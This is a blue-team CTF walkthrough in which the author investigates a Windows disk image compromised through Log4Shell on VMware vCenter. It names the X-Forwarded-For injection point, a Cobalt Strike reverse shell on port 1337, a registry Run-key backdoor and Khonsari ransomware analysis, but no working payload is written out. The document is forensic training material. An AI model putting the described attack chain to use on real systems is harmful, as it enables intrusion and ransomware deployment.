Windows Disk Image Forensics — DetectLog4j (CyberDefenders BlueTeam CTF)
On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021–44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. A challenge for windows disk forensics detecting log4j exploits was released on CyberDefenders
This is a blueteam CTF which is made for security researchers, SOC practitioners to practice analyzing abilities
#1 What is the computer hostname?
check operating system information , we got the hostname vcw65
#2 What is the Timezone of the compromised machine?
click System, controlset001, control , timezoneinformation
pacific standard time : UTC-8
#3 What is the current build number on the system?
click software , Microsoft > Windows NT
current version : 14393
#4 What is the computer IP?
ControlSet001 > Services > Tcpip
DhcpIPAddress REG_SZ 192.168.112.139
#5 What is the domain computer was assigned to?
ControlSet001 > Services > Tcpip> Winsock
#6 When was myoussef user created?
Go to OS Accounts on the left column,
Search for myoussef
found the creation time , 2021–12–28 14:57:23 CST . submitted but failed then change the time to UTC 2021–12–28 06:57:23 UTC it works!
#7 What is the user mhasan password hint?
Go to OS Accounts, search for mhasan
password hint is : https://www.linkedin.com/in/0xmohamedhasan/
#8 What is the version of the VMware product installed on the machine?
Data Artifacts > Installed Programs
search for VMware product , version is 220.127.116.11322
#9 What is the version of the log4j library used by the installed VMware product?
Go to Program Files\VMWare\vCenter Server\common-jars
#10 What is the log4j library log level specified in the configuration file?
keyword search for ‘log4j’ , click log4j.properties
#11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?
Google “vcenter log4j exploit”
“The vulnerability is in the X-Forwarded-For header on the vCenter SSO login page…” , so HTTP header should be X-Forwarded-For
Sprocket Security | How to exploit Log4j vulnerabilities in VMWare...
A vulnerability was recently disclosed for the Java logging library, Log4j. The vulnerability is wide-reaching and…
#12 The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?
keyword search for ‘log4shell.huntress.com’
click on websso.log and we get the payload
#13 When was the first successful login to vsphere WebClient?
first sucess login : 12/28/2021 12:39:29 PST
submitted with UTC format 28/12/2021 20:39:29 UTC
#14 What is the attacker’s IP address?
look for attacker’s IP in audit_events.log
#15 What is the port the attacker used to receive the cobalt strike reverse shell?
look for base64 strings path
decode with cyberchef , choose from base64 and gunzip
Download the decoded command and save it with a .ps1 extension
The tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services. Using FakeNet-NG, malware analysts can quickly identify malware’s functionality and capture network signatures. Penetration testers and bug hunters will find FakeNet-NG’s configurable interception engine and modular framework highly useful when testing application’s specific functionality and prototyping PoCs.
run the malscript.ps1 while running fakenet.exe
we see the malware connects to the host on port 1337
#16 What is the script name published by VMware to mitigate log4shell vulnerability?
#17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?
If updating to the latest version is not possible the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property
log4j2.formatMsgNoLookups or the
LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to
#18 What is the log4j version which contains a patch to CVE-2021–44228?
#19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?
Program Files\VMWare\vCenter Server\VMWare Identity Services\log4j-core-2.11.2.jar
extract log4j-core-s.11.2.jar (right click with the file)
extract the exported jar file
locate the jndi.lookup class
get the file hash
#20 Analyze JNDILookup.class. What is the value stored in the CONTAINER_JNDI_RESOURCE_PATH_PREFIX variable?
Program Files\VMWare\vCenter Server\cm\lib\log4j-core.jar
static final String CONTAINER_JNDI_RESOURCE_PATH_PREFIX = java:comp/env/;
#21 What is the executable used by the attacker to gain persistence?
SOFTWARE > Microsoft > Windows > CurrentVersion
p33r REG_SZ C:\Users\Adiminstrator\Desktop\baaaackdooor.exe
#22 When was the first submission of ransomware to virustotal?
The ransomware is khonsari.exe, search on virustotal and found the first submiss 2021–12–11 22:57:01
#23 The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?
search on bazaar malware database
download the malware sample (make sure do this in a safe environment)
download tool dnSpy
dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don’t have any source code available.
GitHub - dnSpy/dnSpy: .NET debugger and assembly editor
dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any…
upload the malware to dnSpy
right click dorfier and go to entry point
got the text ‘GoaahQrC’
#24 What is the ISP that owns that IP that serves the text file?
search on virustotal
we see the contaced domains is a cloud server address from amazon
#25 The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?
after downloading the string, the malware looks for drive and mount to it
then encrypt all contents found
Khonsari Ransomware Campaign Exploiting the Log4Shell Vulnerability
The Log4J vulnerability, which is being actively exploited in the wild, has led to a significant spike in ransomware…
from the article khonsari ransomware analysis, we could see its behavior